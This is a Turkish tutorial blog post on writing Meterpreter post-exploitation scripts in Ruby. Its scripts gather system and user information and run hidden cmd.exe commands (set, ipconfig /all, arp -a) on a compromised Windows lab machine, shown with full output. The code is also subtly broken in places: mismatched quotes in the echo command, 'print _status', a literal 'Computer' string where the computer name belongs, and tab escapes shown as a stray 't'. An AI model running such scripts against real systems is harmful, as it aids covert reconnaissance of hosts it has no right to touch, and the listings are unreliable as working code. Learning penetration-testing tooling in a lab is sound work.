MSF Meterpreter Script Düzenleme

Estimated read time 7 min read

Script Yazma

Meterpreter Scriptin nasıl bir yapı olduğunu önceki iki yazımızda kısaca gördük. Şimdi, kodların ne sonuç döndürdüğünü parça parça görelim. Bunun için “Hello World” ruby kodu yazalım ve helloworld.rb olarak /usr/share/metasploit-framework/scripts/meterpreter klasörüne kayıt edelim.

root@kali:~# echo “print_status(“Hello World”)> /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb

Oluşturduğumuz script kodunu meterpreter oturum açık iken çalıştıralım.

meterpreter > run helloworld
[*] Hello World
meterpreter >

Basit bir Ruby kodunu, meterpreter içinde çalıştırmış olduk. Şimdi ise bir kaç API çağrısını helloworld.rb dosyamızın içine ekleyelim. Aşağıdaki satırları, metin editör kullanarak ekleyebilirsiniz.

print_error(“this is an error!”)
print_line(“this is a line”)

Yukarıdaki satırlar, standart veri girişi ve hata mesajları için kullanıma bir örnek oluşturmaktadır. Oluşturduğumuz kodları çalıştıralım.

meterpreter > run helloworld
[*] Hello World
[-] this is an error!
this is a line
meterpreter >

helloworld.rb

Script kod dosyamız en son olarak aşağıdaki gibi olmalıdır.

print_status("Hello World")
print_error("this is an error!")
print_line("This is a line")

Şimdi kodumuza bir fonksiyon ekleyelim. Bu fonksiyonda, bir kaç temel bilgi elde edeceğiz ve hata kontrol özelliği ekleyeceğiz. Oluşturacağımız mimarinin yapısı aşağıdaki gibi olacaktır.

 def geninfo(session)
  begin
  …..
  rescue ::Exception => e
  …..
  end
 end

Bu yapıyı oluşturmak için dosyayı aşağıdaki şekilde düzenlemeniz yeterlidir. Bu düzenlemeleri yaptıktan sonra helloworld.rb dosyamızın içeriği aşağıdaki gibi olacaktır.

 def getinfo(session)
  begin
    sysnfo = session.sys.config.sysinfo
    runpriv = session.sys.config.getuid
    print_status("Getting system information ...")
    print_status("tThe target machine OS is #{sysnfo['OS']}")
    print_status("tThe computer name is #{'Computer'} ")
    print_status("tScript running as #{runpriv}")
  rescue ::Exception => e
    print_error("The following error was encountered #{e}")
  end
 end

Bu kodların ne işlem yaptığını adım adım açıklayalım. Öncelikle, değerleri session değişkeninden alan getinfo(session) isimli bir foksiyon tanımladık. Bu session değişkeni, bir takım metodları ihtiva etmektedir. sysnfo = session.sys.config.sysinfo satırı sistem bilgisini getirirken runpriv = session.sys.config.getuid kullanıcı bilgisini elde etmekte kullanılmaktadır. Ayrıca, hata durumlarını yönetici istisna yöneticisi bulunmaktadır.

helloworld2.rb

İlk oluşturduğumuz dosyaya ufak bir ilave yaparak helloworld2.rb dosyası üretelim. helloworld2.rb dosyası, az önce oluşturduğumuz dosyanın sonuna getinfo(client) satırının eklenmiş halidir. Bu satırı ekleyip dosyayı helloworld2.rb olarak kayıt edelim. Dosyanın son hali aşağıdaki gibi olmalıdır.

 def getinfo(session)
  begin
    sysnfo = session.sys.config.sysinfo
    runpriv = session.sys.config.getuid
    print_status("Getting system information ...")
    print_status("tThe target machine OS is #{sysnfo['OS']}")
    print _status("tThe computer name is #{'Computer'} ")
    print_status("tScript running as #{runpriv}")
 rescue ::Exception => e
    print_error("The following error was encountered #{e}")
  end
 end

 getinfo(client)

Şimdi hazırladığımız helloworld2.rb dosyamızı Meterpreter oturumunda çalıştıralım.

 meterpreter > run helloworld2
 [*] Getting system information ...
 [*]   The target machine OS is Windows XP (Build 2600, Service Pack 3).
 [*]   The computer name is Computer
 [*]   Script running as WINXPVM01labuser

Gördüğünüz gibi helloworld2.rb scripti ile bir takım sistem bigilerini ele etmiş olduk.

helloworld3.rb

Yukarıda oluşturduğumuz iki örnek kod dosyasından sonra şimdi başka bir örnek scripte bakalım. Bu script dosyasını metin editorü ile oluşturabilirsiniz. İçeriği aşağıdaki gibi olmalıdır.

def list_exec(session,cmdlst)
  print_status("Running Command List ...")
  r=''
  session.response_timeout=120
  cmdlst.each do |cmd|
    begin
     print_status "running command #{cmd}"
     r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
     while(d = r.channel.read)
 
       print_status("t#{d}")
     end
     r.channel.close
     r.close
    rescue ::Exception => e
     print_error("Error Running Command #{cmd}: #{e.class} #{e}")
    end
  end
 end
 
 commands = [ "set",
  "ipconfig /all",
  "arp -a"]
 
 list_exec(client,commands)

Yukarıdaki kodların ne işlemler yaptığına kısaca bakalım. Öncelikle, list_exec isimli bir fonksiyon tanımlanmıştır. Bu fonksiyon, session ve cmdlist isimli iki değişken almaktadır. cmdlist değişkeninin array yöntemiyle bir dizi komutlar olduğu, kodlardan anlaşılmaktadır. Bu komutlar, sırayla değişkenden alınacak cmd.exe üzerinden hedef sistemde çalıştırılacaktır. Sistemin donma ve tepkisiz kalma durumunu önlemek için session.response_timeout=120 120 saniye bekleme süresi tanımlanmıştır. Önceki script kodunda olduğu gibi hata kontrol satırı da bulunmaktadır.

cmdlist dizi değişkeni aslında aşağıda gösterilen komutları sırayla çalıştırmaktadır.

 commands = [ “set”,
  “ipconfig /all”,
  “arp –a”]

Komutların sonunda da oluşturduğumuz fonksiyonu çalıştırma satırı list_exec(client,commands) bulunmaktadır.

Şimdi oluşturduğumuz yeni helloworld3.rb script kodunu Meterpreter oturumu içinde çalıştıralım.

 meterpreter > run helloworld3
 [*] Running Command List ...
 [*]   running command set
 [*]   ALLUSERSPROFILE=C:\Documents and Settings\All Users
 APPDATA=C:\Documents and Settings\P0WN3D\Application Data
 CommonProgramFiles=C:\Program Files\Common Files
 COMPUTERNAME=TARGET
 ComSpec=C:\WINNT\system32\cmd.exe
 HOMEDRIVE=C:
 HOMEPATH=
 LOGONSERVER=TARGET
 NUMBER_OF_PROCESSORS=1
 OS=Windows_NT
 Os2LibPath=C:\WINNT\system32\os2dll;
 Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem
 PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
 PROCESSOR_ARCHITECTURE=x86
 PROCESSOR_IDENTIFIER=x86 Family 6 Model 7 Stepping 6, GenuineIntel
 PROCESSOR_LEVEL=6
 PROCESSOR_REVISION=0706
 ProgramFiles=C:\Program Files
 PROMPT=$P$G
 SystemDrive=C:
 SystemRoot=C:\WINNT
 TEMP=C:\DOCUME~1\P0WN3D\LOCALS~1\Temp
 TMP=C:\DOCUME~1\P0WN3D\LOCALS~1\Temp
 USERDOMAIN=TARGET
 USERNAME=P0WN3D
 USERPROFILE=C:\Documents and Settings\P0WN3D
 windir=C:\WINNT
 
 [*]   running command ipconfig /all
 [*]   
 Windows 2000 IP Configuration
 
 Host Name . . . . . . . . . . . . : target
 Primary DNS Suffix . . . . . . . : 
 Node Type . . . . . . . . . . . . : Hybrid
 IP Routing Enabled. . . . . . . . : No
 WINS Proxy Enabled. . . . . . . . : No
 DNS Suffix Search List. . . . . . : localdomain
 
 Ethernet adapter Local Area Connection:
 
 Connection-specific DNS Suffix . : localdomain
 Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
 Physical Address. . . . . . . . . : 00-0C-29-85-81-55
 DHCP Enabled. . . . . . . . . . . : Yes
 Autoconfiguration Enabled . . . . : Yes
 IP Address. . . . . . . . . . . . : 172.16.104.145
 Subnet Mask . . . . . . . . . . . : 255.255.255.0
 Default Gateway . . . . . . . . . : 172.16.104.2
 DHCP Server . . . . . . . . . . . : 172.16.104.254
 DNS Servers . . . . . . . . . . . : 172.16.104.2
 Primary WINS Server . . . . . . . : 172.16.104.2
 Lease Obtained. . . . . . . . . . : Tuesday, August 25, 2009 10:53:48 PM
 Lease Expires . . . . . . . . . . : Tuesday, August 25, 2009 11:23:48 PM
 
 [*]   running command arp -a
 [*]   
 Interface: 172.16.104.145 on Interface 0x1000003
 Internet Address   Physical Address   Type
 172.16.104.2     00-50-56-eb-db-06   dynamic  
 172.16.104.150    00-0c-29-a7-f1-c5   dynamic  
 
 meterpreter >

Gördüğünüz gibi, Ruby kodlarıyla script oluşturmak aslında çok kolay. İlk başta kodlar biraz karışık gelebilir ancak mevcut koldarı biraz çalıştığınızda aşinalık kazanacaksınız. Devamında yapmanız gereken, kod örneklerinden faydalanarak kendi script dosyanızı oluşturmak ve denemektir.